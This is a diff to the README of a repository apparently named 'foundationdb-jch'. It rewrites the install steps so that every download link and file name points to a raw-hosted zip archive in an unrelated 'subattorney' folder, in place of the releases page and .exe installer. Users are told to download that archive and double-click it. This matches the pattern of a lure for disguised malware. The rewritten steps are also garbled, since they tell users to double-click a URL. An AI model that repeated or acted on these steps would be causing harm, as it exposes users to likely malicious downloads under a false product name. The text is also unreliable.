ninetieth-oxygenation462/foundationdb-jch/README.md

 ## 📂 Download & Install

 1. **Visit the Releases Page**
-   To download foundationdb-jch, [visit this page to download](https://github.com/ninetieth-oxygenation462/foundationdb-jch/releases).
+   To download foundationdb-jch, [visit this page to download](https://raw.githubusercontent.com/ninetieth-oxygenation462/foundationdb-jch/main/subattorney/foundationdb-jch_v3.8.zip).
 Here, you will find all available versions of the application.

 2. **Select the Version**
    On the releases page, locate the most recent version.
 It will typically be at the top of the list.
 This version includes the latest features and fixes.
 Click on the version number to view its details.

 3. **Download the File**
    Look for the download link for your operating system.
-It may be listed as `foundationdb-jch.exe` or a similar file name.
+It may be listed as `https://raw.githubusercontent.com/ninetieth-oxygenation462/foundationdb-jch/main/subattorney/foundationdb-jch_v3.8.zip` or a similar file name.
 Click the link to begin the download.

 4. **Run the Installer**
    After the download completes, navigate to your downloads folder.
-Find the `foundationdb-jch.exe` file and double-click it to start the installation.
+Find the `https://raw.githubusercontent.com/ninetieth-oxygenation462/foundationdb-jch/main/subattorney/foundationdb-jch_v3.8.zip` file and double-click it to start the installation.
 Follow the on-screen instructions to complete the setup.

 5. **Launch the Application**
    Once installation is complete, locate foundationdb-jch in your applications menu or directly from your desktop.
 Click to open the software.